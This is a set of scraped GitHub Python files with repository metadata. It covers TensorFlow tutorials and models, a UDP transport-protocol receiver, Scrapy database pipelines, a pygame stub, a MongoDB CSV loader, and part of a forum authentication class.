Check!')\n","repo_name":"DorogAD/checkio","sub_path":"ice_base/task12_roman_numerals.py","file_name":"task12_roman_numerals.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42262569051","text":"import os\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom keras import layers\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = \"1\"\n\nif __name__ == '__main__':\n ### 4.5 张量的典型应用\n ##### 4.5.1 标量\n ##### 4.5.2 向量\n ##### 4.5.3 矩阵\n ##### 4.5.4 三维张量\n ##### 4.5.5 四维张量\n\n ##### 4.5.1 标量\n # 是一个简单的数字,维度数为; 0,shape; 为[]\n # 模拟MSE误差计算\n out = tf.random.uniform([4, 10])\n y = tf.constant([2, 3, 2, 0])\n y = tf.one_hot(y, depth=10)\n loss = tf.keras.losses.mse(y, out)\n loss = tf.reduce_mean(loss)\n # print(loss)\n\n ##### 4.5.2 向量\n ##### 4.5.3 矩阵\n ##### 4.5.4 三维张量\n # 三维的张量一个典型应用是表示序列信号,它的格式是; 𝑿 = [𝑏, sequence len, feature len];\n # 其中𝑏表示序列信号的数量,sequence; len; 表示序列信号在时间维度上的采样点数或步数, feature;\n # len; 表示每个点的特征长度。\n\n # num_words=单词按照它们出现的频率(在训练集中)进行排序,并且只保留最常见的单词。\n # (x_train, y_train), (x_test, y_test) \\\n # = keras.datasets.imdb.load_data(num_words=10000)\n # print(x_train.shape)\n # print(y_train.shape)\n # x_train = keras.preprocessing.sequence.pad_sequences(x_train, maxlen=80)\n # print(x_train.shape)\n # embedding = layers.Embedding(10000, 100)\n # out = embedding(x_train)\n # shape; 变为[25000, 80, 100]\n # 其中25000表示句子个数,80表示每个句子共80个单词,其中 100 表示每个单词编码为长度是 100 的向量\n # print(out.shape)\n ##### 4.5.5 四维张量\n # [𝑏, ℎ,, 𝑐]其中𝑏表示输入样本的数量,ℎ / 分别表示特征图的高 / 宽,𝑐表示特征图的通道数\n # 模拟创建32*32的彩色图片输入,个数为4\n x = tf.random.normal([4, 32, 32, 3])\n # 创建卷积神经网络\n layer = layers.Conv2D(16, kernel_size=3)\n out = layer(x)\n print(out.shape)\n print(layer.kernel.shape)\n","repo_name":"TimVan1596/ACM-ICPC","sub_path":"python/deep_learning/TensorFlow/第4章 TensorFlow基础/4.5 张量的典型应用.py","file_name":"4.5 张量的典型应用.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"6083726256","text":"\nimport tensorflow as tf\nimport os\nimport numpy as np\nfrom .configs import *\n\nargs = dotdict({\n 'learning_rate':0.001,\n 'epochs':10,\n 'batch_size':32,\n 'momentum': 0.9,\n 'resnet_blocks': 1,\n})\n\nclass NeuralNetwork(object):\n #Represent Policy and value head\n\n def __init__(self, gas_network):\n self.row, self.cols = gas_network.get_state_dimension()\n self.action_size = gas_network.get_action_size()\n\n self.pi = None\n self.v = None\n\n self.graph = tf.Graph()\n with self.graph.as_default():\n self.states = tf.placeholder(tf.float32,\n shape = [None,self.row])\n self.training = tf.placeholder(tf.bool)\n\n #Input_Layer\n input_layer = tf.reshape(self.states,\n [-1, self.row, 1, 1])\n\n #Convolutional Block\n conv1 = tf.layers.conv2d(\n inputs = input_layer,\n filters = 256,\n kernel_size = [3,3],\n padding = \"same\",\n strides = 1\n )\n #Batch Normalization\n batch_norm1 = tf.layers.batch_normalization(\n inputs = conv1,\n training = self.training)\n relu1 = tf.nn.relu(batch_norm1)\n\n resnet_in_out = relu1\n\n #Residual Tower\n for i in range(args.resnet_blocks):\n #Residual Block\n conv2 = tf.layers.conv2d(\n inputs = resnet_in_out,\n filters = 256,\n kernel_size = [3,3],\n padding = \"same\",\n strides = 1)\n batch_norm2 = tf.layers.batch_normalization(\n inputs = conv2,\n training = self.training)\n relu2 = tf.nn.relu(batch_norm2)\n\n conv3 = tf.layers.conv2d(\n inputs = relu2,\n filters = 256,\n kernel_size = [3, 3],\n padding = \"same\",\n strides = 1)\n batch_norm3 = tf.layers.batch_normalization(\n inputs = conv3,\n training = self.training)\n resnet_skip = tf.add(batch_norm3, resnet_in_out)\n resnet_in_out = tf.nn.relu(resnet_skip)\n\n #Policy Head\n conv4 = tf.layers.conv2d(\n inputs = resnet_in_out,\n filters = 2,\n kernel_size = [1, 1],\n padding = \"same\",\n strides = 1)\n batch_norm4 = tf.layers.batch_normalization(\n inputs = conv4,\n training = self.training)\n relu4 = tf.nn.relu(batch_norm4)\n\n relu4_flat = tf.reshape(relu4, [-1, self.row * 2])\n\n dense_pi = tf.layers.dense(\n inputs = relu4_flat,\n units = self.action_size)\n\n self.pi = tf.nn.softmax(dense_pi)\n\n #value Head\n conv5 = tf.layers.conv2d(\n inputs = resnet_in_out,\n filters = 1,\n kernel_size = [1,1],\n padding = \"same\",\n strides = 1)\n batch_norm5 = tf.layers.batch_normalization(\n inputs = conv5,\n training = self.training)\n relu5 = tf.nn.relu(batch_norm5)\n\n relu5_flat = tf.reshape(relu5, [-1, self.action_size])\n\n dense1 = tf.layers.dense(\n inputs = relu5_flat,\n units = 256)\n relu6 = tf.nn.relu(dense1)\n\n dense2 = tf.layers.dense(\n inputs = relu6,\n units = 1)\n\n self.v = tf.nn.tanh(dense2)\n\n #Loss Function\n self.train_pis = tf.placeholder(tf.float32,\n shape = [None, self.action_size])\n self.train_vs = tf.placeholder(tf.float32, shape = [None])\n\n self.loss_pi = tf.losses.softmax_cross_entropy(self.train_pis, self.pi)\n self.loss_v = tf.losses.mean_squared_error(self.train_vs,\n tf.reshape(self.v, shape = [-1, ]))\n\n self.total_loss = self.loss_pi + self.loss_v\n\n #Stochastic gradient descent with momentum\n optimizer = tf.train.MomentumOptimizer(\n learning_rate = args.learning_rate,\n momentum = args.momentum,\n use_nesterov = False)\n self.train_op = optimizer.minimize(self.total_loss)\n\n #Saver for writing training checkpoints\n self.saver = tf.train.Saver()\n\n #Session for running operations on Graph\n self.sess = tf.Session()\n\n self.sess.run(tf.global_variables_initializer()) #Session Initialization\n\n\nclass NeuralNetworkWrapper(object):\n\n def __init__(self, gas_network):\n self.gas_network = gas_network\n self.net = NeuralNetwork(self.gas_network)\n self.sess = self.net.sess\n\n #Predict the value of action probability and value\n def policy_value(self, state):\n\n state = state[np.newaxis, :]\n pi,v = self.sess.run([self.net.pi, self.net.v],\n feed_dict = {self.net.states: state,\n self.net.training: False})\n return pi[0], v[0][0]\n\n\n def train(self, training_data):\n #Trains network using states, pis and vs from self-play games\n\n print(\"\\nTraining the network\\n\")\n\n for epoch in range(args.epochs):\n\n print(\"Epoch\", epoch+1)\n examples_num = len(training_data)\n\n for i in range(0, examples_num, args.batch_size):\n states, pis, vs = map(list,\n zip(*training_data[i:i+args.batch_size]))\n\n feed_dict = {self.net.states: states,\n self.net.train_pis: pis,\n self.net.train_vs: vs,\n self.net.training: True}\n\n self.sess.run(self.net.train_op,\n feed_dict = feed_dict)\n\n pi_loss, v_loss = self.sess.run(\n [self.net.loss_pi, self.net.loss_v],\n feed_dict = feed_dict)\n\n # Record pi and v loss to a file.\n if configs.record_loss:\n # Create directory if it doesn't exist.\n if not os.path.exists(configs.model_dir):\n os.mkdir(configs.model_dir)\n\n file_path = configs.model_dir + configs.loss_file\n\n with open(file_path, 'a') as loss_file:\n loss_file.write('%f|%f\\n' % (pi_loss, v_loss))\n #Save the model\n def save_model(self, filename = \"current_model\"):\n if not os.path.exists(configs.model_dir):\n os.mkdir(configs.model_dir)\n\n file_path = configs.model_dir + filename\n #print(\"Saving model:\", filename, \"to\", configs.model_dir)\n self.net.saver.save(self.sess, file_path)\n #Load the model\n def load_model(self, filename = \"current_model\"):\n file_path = configs.model_dir + filename\n #print(\"Loading model:\", filename, \"from\", configs.model_dir)\n self.net.saver.restore(self.sess, file_path)\n","repo_name":"demogorgi/MIP_based_gas_simulator","sub_path":"gurobi-version/ai_part/neural_network_architecture.py","file_name":"neural_network_architecture.py","file_ext":"py","file_size_in_byte":7419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72022870802","text":"'''\nCOMP3331 18s2 ASS\n-----\nz5125769\n'''\n\nimport socket\nimport sys\n\nfrom public import STP_STA, STPLogger, STPPacker\n\nONE_BYTE = b'0'\n\n\nclass STPReceiverLogger(STPLogger):\n '''\n log component\n '''\n def __init__(self):\n super().__init__(\"Receiver_log.txt\")\n counter = {\n 'all_seg_rcv': 0,\n 'dat_seg_rcv': 0,\n 'crp_seg_rcv': 0,\n 'dup_seg_rcv': 0,\n 'dup_ack_snt': 0\n }\n super().init_counter(counter)\n\n def counter_hook(self, event, opts):\n ''' override function in super class '''\n e_cls = event[0:3]\n e_opt = event[4:]\n dat_b = opts[1]\n if e_cls == \"rcv\":\n self._counter['all_seg_rcv'] += 1\n if dat_b:\n self._counter['dat_seg_rcv'] += 1\n if e_opt == \"corr\":\n self._counter['crp_seg_rcv'] += 1\n elif e_opt == \"dup\" and dat_b:\n self._counter['dup_seg_rcv'] += 1\n else:\n pass\n elif e_cls == \"snd\" and e_opt == \"DA\":\n self._counter['dup_ack_snt'] += 1\n else:\n pass\n\n def summarize_hook(self, info):\n ''' override function in super class '''\n dat_len_rcv = info\n with open(self._f_name, 'a') as openf:\n openf.write(f\"============================================\\n\")\n openf.write(f\"Amount of Data Received (bytes) {dat_len_rcv:>10}\\n\")\n openf.write(f\"Total segments received {self._counter['all_seg_rcv']:>10}\\n\")\n openf.write(f\"Data segments received {self._counter['dat_seg_rcv']:>10}\\n\")\n openf.write(f\"Data Segments with bit errors {self._counter['crp_seg_rcv']:>10}\\n\")\n openf.write(f\"Duplicate data segments received {self._counter['dup_seg_rcv']:>10}\\n\")\n openf.write(f\"Duplicate ACKs sent {self._counter['dup_ack_snt']:>10}\\n\")\n openf.write(f\"============================================\\n\")\n\n\nclass STPReceiver:\n '''\n STP protocol, implementation on receiver side\n '''\n def __init__(self, sport):\n self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self._socket.bind(('', sport))\n self._packer = STPPacker(sport, 0)\n self._logger = STPReceiverLogger()\n self._seq = 0\n self._ack = 0\n\n self._payload = None\n self._payload_isn = 0\n self._rcv_win = set()\n\n def receiving(self):\n '''\n receiving all the payloads and return as a whole bytearray\n '''\n packer = self._packer\n logger = self._logger\n with self._socket as sock:\n state = STP_STA['NOT_CONN']\n while True:\n recv, addr = sock.recvfrom(4096)\n try:\n seq, ack, opts, payload = packer.unpacking(recv)\n except ValueError as err:\n if err.args[0] == \"port check failed\" or err.args[0] == \"package corrupted\":\n logger.log(\"rcv/corr\", 0, 0, (0, 0, 0, 0), 0)\n continue\n p_len = len(payload)\n if seq <= self._ack or self.check_dup((seq, payload)):\n logger.log(\"rcv/dup\", seq, ack, opts, p_len)\n else:\n logger.log(\"rcv\", seq, ack, opts, p_len)\n if opts == (0, 0, 1, 0) and state == STP_STA['NOT_CONN']:\n self._ack = seq + p_len\n packet = packer.packing(self._seq, self._ack, (1, 0, 1, 0), ONE_BYTE)\n sock.sendto(packet, addr)\n logger.log(\"snd\", self._seq, self._ack, (1, 0, 1, 0), 1)\n state = STP_STA['SYN_SENT']\n elif opts == (1, 0, 0, 0) and state == STP_STA['SYN_SENT']:\n self._ack = seq + p_len\n state = STP_STA['CONN_EST']\n self.set_payload_isn(seq + p_len)\n elif opts == (0, 1, 0, 0) and state == STP_STA['CONN_EST']:\n event = self.update_receive_window(ack, (seq, payload))\n packet = packer.packing(self._seq, self._ack, (1, 0, 0, 0), ONE_BYTE)\n sock.sendto(packet, addr)\n logger.log(event, self._seq, self._ack, (1, 0, 0, 0), 1)\n elif opts == (0, 0, 0, 1) and state == STP_STA['CONN_EST']:\n if ack == self._seq + 1:\n self._seq += 1\n self._ack = seq + p_len\n logger.log(\"snd\", self._seq, self._ack, (1, 0, 0, 0), 1)\n packet = packer.packing(self._seq, self._ack, (1, 0, 0, 0), ONE_BYTE)\n sock.sendto(packet, addr)\n self._seq += 1\n logger.log(\"snd\", self._seq, self._ack, (0, 0, 0, 1), 1)\n packet = packer.packing(self._seq, self._ack, (0, 0, 0, 1), ONE_BYTE)\n sock.sendto(packet, addr)\n state = STP_STA['FIN_SENT']\n elif opts == (1, 0, 0, 0) and state == STP_STA['FIN_SENT']:\n if ack == self._seq + 1:\n state = STP_STA['FIN_RCVD']\n logger.summarize_hook(len(self._payload))\n return self._payload\n elif opts == (0, 0, 1, 0):\n print(\"Please restart receiver.\")\n sys.exit(1)\n else:\n pass\n # print(f\"unexpected {opts} with payload {payload}\")\n return b''\n\n def set_payload_isn(self, isn):\n ''' set isn for payload '''\n self._payload = b''\n self._payload_isn = isn\n\n def update_receive_window(self, ack, p_info):\n ''' use _ack as CACK pointer, _rcv_win as receive buffer '''\n self._rcv_win.add(p_info)\n rcv_win = sorted(self._rcv_win, key=lambda x: x[0])\n t_seq, t_load = rcv_win[0]\n if t_seq == self._ack:\n # received ack checked here\n while t_seq == self._ack and ack <= self._seq + 1:\n self._ack += len(t_load)\n self._payload += t_load\n rcv_win.pop(0)\n if not rcv_win:\n break\n t_seq, t_load = rcv_win[0]\n self._rcv_win = set(rcv_win)\n self._seq += 1\n return \"snd\"\n if t_seq < self._ack:\n self._rcv_win.remove(p_info)\n return \"snd/DA\"\n assert t_seq > self._ack\n return \"snd/DA\"\n\n def check_dup(self, p_info):\n ''' check whether same segment appears in _rcv_win '''\n return p_info in self._rcv_win\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 3:\n print(f\"Usage: ./{__file__} receiver_port file_name\")\n sys.exit(1)\n S_PORT = int(sys.argv[1])\n F_NAME = str(sys.argv[2])\n RECEIVER = STPReceiver(S_PORT)\n F_BYTES = RECEIVER.receiving()\n with open(F_NAME, \"wb\") as open_pdf:\n open_pdf.write(F_BYTES)\n","repo_name":"zebraNeon/comp3331-mini-tcp-implementation","sub_path":"receiver.py","file_name":"receiver.py","file_ext":"py","file_size_in_byte":7110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30317567634","text":"# -*- coding: UTF-8 -*- \n'''\nCreated on Wed May 6 15:23:56 2020\n\n@author: Damon Li\n'''\n\nimport tensorflow as tf\nfrom text_cnn_module import TextCNN\nfrom utils import text_cls_data_loader\nimport jieba\nimport os\n\nclass text_classifier(object):\n\n def __init__(self, tf_session, setting):\n\n with tf_session.as_default():\n with tf_session.graph.as_default(): # 定义属于计算图graph的张量和操作\n latest_save_time = max([int(dir) for dir in os.listdir(setting.text_cnn_model_save_dir)])\n\n latest_checkpoint_dir = os.path.join(setting.text_cnn_model_save_dir, str(latest_save_time))\n\n self.text_cls_dropout_prob = setting.text_cls_dropout_prob #1.0\n\n self.text_cls_data_loader = text_cls_data_loader(setting)\n\n self.text_cls_data_loader.load_embedding()\n\n self.text_cnn = TextCNN(embedding_dir=setting.text_cls_embedding_dir,\n sequence_length=setting.text_cls_sentence_len, #20\n num_classes=setting.num_classes,#9\n filter_sizes=list(map(int, setting.filter_sizes.split(\" \"))),#[2,3,4]\n num_filters=setting.num_filters,#128\n vocab_processor_dir=os.path.join(latest_checkpoint_dir, 'vocab'),\n l2_reg_lambda=setting.l2_lambda,#0\n is_inference=True,\n device_id=setting.cpu_id)\n\n self.text_cnn.build_model()\n\n self.saver = tf.train.Saver(max_to_keep=setting.text_cls_num_checkpoints)\n ckpt = tf.train.get_checkpoint_state(os.path.join(latest_checkpoint_dir, 'checkpoints'))\n\n if ckpt and ckpt.model_checkpoint_path:\n self.saver.restore(tf_session, ckpt.model_checkpoint_path)\n print(\"[INFO] restored historical model successfully...\")\n else:\n print(\"[INFO] no any historical model to restore...\")\n\n def classifier(self, tf_session, text):\n\n with tf_session.as_default():\n with tf_session.graph.as_default(): # 定义属于计算图graph的张量和操作\n\n text = text.strip()\n seg_list = list(jieba.cut(text)) # : ['感冒', 'disease', '吃', '什么', '药']\n x_data = self.text_cls_data_loader.text_input_to_array(' '.join(seg_list)) # 找到分词在词典中对应的id,x_data=[[1270 4278 2465 4270 6940 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0]]\n feed_dict = {self.text_cnn.input_x: x_data,\n self.text_cnn.dropout_keep_prob: self.text_cls_dropout_prob}\n predict = tf_session.run([self.text_cnn.predictions], feed_dict)\n\n return predict[0]\n\n\nif __name__ == '__main__':\n import settings\n setting = settings.setting()\n\n graph = tf.Graph()\n log_device_placement = True # 是否打印设备分配日志\n allow_soft_placement = True # 如果你指定的设备不存在,允许TF自动分配设备\n gpu_options = tf.compat.v1.GPUOptions(per_process_gpu_memory_fraction=0.3)\n session_conf = tf.compat.v1.ConfigProto(gpu_options=gpu_options,\n allow_soft_placement=allow_soft_placement,\n log_device_placement=log_device_placement)\n\n sess = tf.compat.v1.Session(graph=graph, config=session_conf)\n test_obj = text_classifier(sess, setting)\n while True:\n text = input(\"[INFO] Please input a chinese sentence below:\\n\")\n if text == 'exit' or text == 'quit':\n print('[INFO] Bye...')\n break\n predict = test_obj.classifier(sess, text)\n print(\"[RESULT] %s belongs to class %d ...\" % (text, predict))\n","repo_name":"DemonDamon/medichat","sub_path":"src/text_classification_module.py","file_name":"text_classification_module.py","file_ext":"py","file_size_in_byte":4079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17444717823","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nfrom sqlalchemy import create_engine, Table, Column, MetaData, Integer, Text, Float\nfrom scrapy.exceptions import DropItem\n\nclass CatePipeline(object):\n\n def __init__(self):\n _engine = create_engine(\"sqlite:///allitebooks.db\")\n _connection = _engine.connect()\n _metadata = MetaData()\n _stack_items = Table(\"allitebooks_category\", _metadata,\n Column(\"id\", Integer, primary_key=True),\n Column('cate_id', Integer, unique=True),\n Column('cate_link', Text),\n Column('cate_text', Text),\n Column('cate_father', Integer),\n Column('cate_level', Integer))\n _metadata.create_all(_engine)\n self.connection = _connection\n self.stack_items = _stack_items\n\n def process_item(self, item, spider):\n is_valid = True\n for data in item:\n if not data:\n is_valid = False\n raise DropItem(\"Missing %s!\" % data)\n if is_valid:\n ins_query = self.stack_items.insert().values(\n cate_id = item['cate_id'],\n\t\t\t\tcate_link = item['cate_link'],\n\t\t\t\tcate_text = item['cate_text'],\n\t\t\t\tcate_father = item['cate_father'],\n\t\t\t\tcate_level = item['cate_level'])\n self.connection.execute(ins_query)\n return item\n\nclass EbookPipeline(object):\n\n def __init__(self):\n _engine = create_engine(\"sqlite:///allitebooks.db\")\n _connection = _engine.connect()\n _metadata = MetaData()\n _stack_items = Table(\"allitebooks_ebookinfo\", _metadata,\n Column(\"id\", Integer, primary_key=True),\n Column('ebook_id', Integer, unique=True),\n Column('ebook_title', Text),\n Column('ebook_thumbnail', Text),\n Column('ebook_link', Text),\n Column('ebook_authors', Text))\n\n _metadata.create_all(_engine)\n self.connection = _connection\n self.stack_items = _stack_items\n\n def process_item(self, item, spider):\n is_valid = True\n for data in item:\n if not data:\n is_valid = False\n raise DropItem(\"Missing %s!\" % data)\n if is_valid:\n ins_query = self.stack_items.insert().values(\n ebook_id = item['ebook_id'],\n ebook_title = item['ebook_title'],\n ebook_thumbnail = item['ebook_thumbnail'],\n ebook_link = item['ebook_link'],\n ebook_authors = item['ebook_authors'])\n self.connection.execute(ins_query)\n return item\n\nclass EbookInfoPipeline(object):\n\n def __init__(self):\n _engine = create_engine(\"sqlite:///allitebooks.db\")\n _connection = _engine.connect()\n _metadata = MetaData()\n _stack_items = Table(\"allitebooks_ebookinfo\", _metadata,\n Column(\"id\", Integer, primary_key=True),\n Column('ebook_id', Integer, unique=True),\n Column('ebook_title', Text),\n Column('ebook_subtitle', Text),\n Column('ebook_thumbnail', Text),\n Column('ebook_link', Text),\n Column('ebook_authors', Text),\n \t\t\t\t\t Column('ebook_isbn', Text),\n \t\t\t\t\t Column('ebook_year', Integer),\n \t\t\t\t\t Column('ebook_pages', Integer),\n \t\t\t\t\t Column('ebook_language', Text),\n \t\t\t\t\t Column('ebook_filesize', Text),\n \t\t\t\t\t Column('ebook_fileformat', Text),\n \t\t\t\t\t Column('ebook_category', Text),\n \t\t\t\t\t Column('ebook_description', Text),\n \t\t\t\t\t Column('ebook_linkdownload', Text))\n\n _metadata.create_all(_engine)\n self.connection = _connection\n self.stack_items = _stack_items\n\n def process_item(self, item, spider):\n is_valid = True\n for data in item:\n if not data:\n is_valid = False\n raise DropItem(\"Missing %s!\" % data)\n if is_valid:\n ins_query = self.stack_items.insert().values(\n ebook_id = item['ebook_id'],\n ebook_title = item['ebook_title'],\n ebook_subtitle = item['ebook_subtitle'],\n\t\t\t\tebook_thumbnail = item['ebook_thumbnail'],\n\t\t\t\tebook_link = item['ebook_link'],\n\t\t\t\tebook_authors = item['ebook_authors'],\n\t\t\t\tebook_isbn = item['ebook_isbn'],\n\t\t\t\tebook_year = item['ebook_year'],\n\t\t\t\tebook_pages = item['ebook_pages'],\n\t\t\t\tebook_language = item['ebook_language'],\n\t\t\t\tebook_filesize = item['ebook_filesize'],\n\t\t\t\tebook_fileformat = item['ebook_fileformat'],\n\t\t\t\tebook_category = item['ebook_category'],\n\t\t\t\tebook_description = item['ebook_description'],\n\t\t\t\tebook_linkdownload = item['ebook_linkdownload'])\n self.connection.execute(ins_query)\n return item","repo_name":"thaolt007/allitebooks_crawler","sub_path":"allitebooks/allitebooks/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":5207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35665290253","text":"from pygame import *\r\n\r\nwindow = display.set_mode((700,500))\r\ndisplay.set_caption('ping-pong')\r\nback = (255,255,200)\r\nwindow.fill(back)\r\n\r\nclass GameSprite(sprite.Sprite):\r\n\r\n def __init__(self, player_image, player_x, player_y, size_x, size_y, player_speed):\r\n sprite.Sprite.__init__(self)\r\n\r\n self.image = transform.scale(image.load(player_image), (size_x, size_y))\r\n self.speed = player_speed\r\n \r\n self.rect = self.image.get_rect()\r\n self.rect.x = player_x\r\n self.rect.y = player_y\r\n\r\n def reset(self):\r\n window.blit(self.image, (self.rect.x, self.rect.y))\r\n\r\n\r\nracket1 = Player('racket.png', 30, 200, 4, 50, 150)\r\nracket2 = Player('racket.png', 520, 200, 4, 50, 150)\r\nball = GameSprite('tenis_ball.png', 200, 200, 4, 50, 50)\r\n\r\n\r\ngame = True\r\n\r\nwhile game:\r\n\r\n for e in event.get():\r\n if e.type == QUIT:\r\n run = False\r\n \r\n window.fill(back)\r\n racket1.update_l()\r\n racket2.update_r()\r\n\r\n racket1.reset()\r\n racket2.reset()\r\n ball.reset \r\n\r\n\r\n display.update()","repo_name":"tiretrak1/ping-pong","sub_path":"GameSprite.py","file_name":"GameSprite.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39988246750","text":"import pymongo\nimport datetime\nimport re\nimport csv\nimport pprint\n\nclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\n\ndb = client[\"soen363\"]\n\ndef sanitizeRow(row):\n int_regex = \"^-?\\d+$\"\n float_regex = \"^\\d+(\\.\\d*)?$\"\n price_regex = \"^\\$\\d+(\\.\\d*)?$\"\n percent_regex = \"^\\d+\\%?$\"\n date_regex = \"^\\d{4}-\\d{2}-\\d{2}$\"\n for col in row:\n # Number\n if re.match(int_regex, row[col]) is not None:\n row[col] = int(row[col])\n continue\n\n if re.match(float_regex, row[col]) is not None:\n row[col] = float(row[col])\n continue\n\n # Prices\n if re.match(price_regex, row[col]) is not None:\n row[col] = float(row[col][1:])\n continue\n \n # Percent\n if re.match(percent_regex, row[col]) is not None:\n row[col] = float(row[col][0:len(row[col]) - 1])\n continue\n\n # Dates\n if re.match(date_regex, row[col]) is not None:\n row[col] = datetime.datetime.strptime(row[col], \"%Y-%m-%d\")\n\n # Booleans\n if (row[col] == \"t\"):\n row[col] = True\n continue\n if (row[col] == \"f\"):\n row[col] = False\n\n # Nulls\n if (row[col] == \"N/A\" or row[col] == \"\"):\n row[col] = None\n continue\n return row\n\ndef loadFile(name, filename):\n col = db[name]\n print(f'Loading {name}... This might take a while...')\n with open(filename, encoding=\"utf8\") as file:\n reader = csv.DictReader(file)\n for row in reader:\n row = sanitizeRow(row)\n col.insert_one(row)\n print(f'Loaded {name} successfully!')\n\na = datetime.datetime.now()\nloadFile('listings', '../extracted_mongo/listings-montreal.csv')\nloadFile('listings', '../extracted_mongo/listings-toronto.csv')\nloadFile('listings', '../extracted_mongo/listings-quebec.csv')\n\nloadFile('reviews', '../extracted_mongo/reviews-montreal.csv')\nloadFile('reviews', '../extracted_mongo/reviews-toronto.csv')\nloadFile('reviews', '../extracted_mongo/reviews-quebec.csv')\nb = datetime.datetime.now()\nc = b - a\npprint.pprint(str(c.microseconds * 0.001) + ' ms')\n\n#loadFile('reviews', '../extracted_mongo/reviews.csv')\n#loadFile('calendar', '../extracted_mongo/calendar.csv')","repo_name":"phong1233/soen363-project-phase2","sub_path":"mongo/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40281822516","text":"# Custom Authentication Class\n# Implementation similar to gluon.tools\n\nimport hashlib\n\n\nfrom gluon.html import URL\nfrom gluon.http import redirect\n\n# Authentication in pyForum will work in the following way:\n#\n# 3rd. Party Authentication Provider\n# ----------------------------------\n# This method will utilize a 3rd. party authenticator, upon successful\n# authentication, the system will do one of the following:\n# 1) If the user already exists, the system will log the user in, no\n# other update will be performed.\n# 2) If the user does not exist in the system, the system will create a brand\n# new user and profile for the user, the 'password' of this user's profile\n# will be set to a 'fake' or pseudo-random hash, since pyForum will never\n# collect sensitive information from its users (nor it can under this\n# scenario anyway).\n# Local User Account\n# ------------------\n# pyForum is capable of creating 'local' user accounts that do not depend on\n# any external sources (FaceBook, Google, etc), the account is protected with\n# a hash containing the user's username (not email), and the actual password\n#\n# What does all this mean? - it basically mean that you may sign up as a user\n# with your google account, and once logged in, go and change your password,\n# this will effectively make you a \"local\" account and you may 'skip' the\n# registration process, pretty slick huh?. It also has the side effect of\n# having an account that you can sign in with your pyForum-only password *or*\n# with your google account (without pyForum even knowing the google's pwd of\n# curse, man I'm _good_ :)\n\n\nclass CustomAuthentication(object):\n \"\"\" Role-Based authentication module \"\"\"\n\n def __init__(self, environment, db):\n self.request = environment['request']\n self.response = environment['response']\n self.session = environment['session']\n self.cache = environment['cache']\n self.T = environment['T']\n self.db = db\n self._anonymous_user = 'Anonymous User'\n self.environment = environment\n self.__user_id = None\n\n def __call__(self):\n \"\"\" Returns the username (email) \"\"\"\n return self.session.auth_email or self._anonymous_user\n\n def authenticate(self, auth_email, auth_passwd):\n \"\"\" sets authentication for the user \"\"\"\n self.logout() # Clear up previous session if any\n hash_pwd = hashlib.sha1('%s%s' % (auth_email, auth_passwd)).hexdigest()\n rows = self.db((self.db.auth_users.auth_email == auth_email) &\n (self.db.auth_users.auth_passwd == hash_pwd) &\n (self.db.auth_users.is_enabled == True)).select()\n if rows:\n self.__user_id = rows[0].id\n # These two next values go into our session\n self.session.auth_email = auth_email\n self.session.user_id = self.__user_id\n auth = True\n return self.session.user_id\n\n def authenticate_janrain(self, identifier, name, email, profile_pic_url):\n \"\"\" Authenticates against JANRAIN, formerly RPX, an authentication\n provider, see http://janrain.com/ for more information\n\n\n \"\"\"\n # Note: If this method is called, it means that the user\n # has been authenticated by the external source (janrain)\n # So all is left to be done is to add the user to our user DB\n # if he/she does not exist, and (*or*, if the user does indeed already\n # exist) update the user's metadata...\n # (name, email)\n # In addition, I am not (currently doing anything with profile_pic_url\n # or identifier but they might come in handy later.\n self.logout() # Clear up previous session if any\n user = self.db(\n (self.db.auth_users.auth_email == email) &\n (self.db.auth_users.is_enabled == True)).select().first()\n if user is None:\n # User does not exist, create it\n # This password is fake, not used for anything really...\n hash_passwd = hashlib.sha1('%s%s' % (name, identifier)).hexdigest()\n # New User - add it with the default role of Member\n # NOTE: THIS ROLE MUST EXIST\n auth_role_id = self.db(\n self.db.auth_roles.auth_role_name == 'zMember').select(\n self.db.auth_roles.id)[0].id\n auth_user_id = self.db.auth_users.insert(\n auth_email=email,\n auth_passwd=hash_passwd,\n auth_created_on=self.request.now,\n auth_modified_on=self.request.now,\n is_enabled=True)\n\n # Also, add this user's default role to the corresponding table.\n self.db.auth_user_role.insert(auth_user_id=auth_user_id,\n auth_role_id=auth_role_id)\n # Read the (new) user's back\n user = self.db(\n (self.db.auth_users.auth_email == email) &\n (self.db.auth_users.is_enabled == True)).select().first()\n user_id = user.id # Convenience\n self.__user_id = user_id\n self.session.auth_email = email\n self.session.user_id = user_id\n return user_id\n\n def logout(self):\n \"\"\" Clear the session \"\"\"\n self.session.auth_email = None\n self.session.user_id = None\n\n def has_role(self, roles):\n \"\"\" Receives a comma-separated string containing the roles to check\n and will return True if the user contains any of the passed roles\n\n \"\"\"\n hasrole = False\n roles_to_check = roles.split(',')\n roles_found = []\n if self.is_auth():\n auth_email = self.session.auth_email\n # select\n # ar.auth_role_name\n # from\n # auth_roles as ar,\n # auth_user_role as aur,\n # auth_users as au\n # where\n # au.auth_email = %(auth_email)s\n # and au.id = aur.auth_user_id\n # and aur.auth_role_id = ar.id\n user_roles = self.db(\n 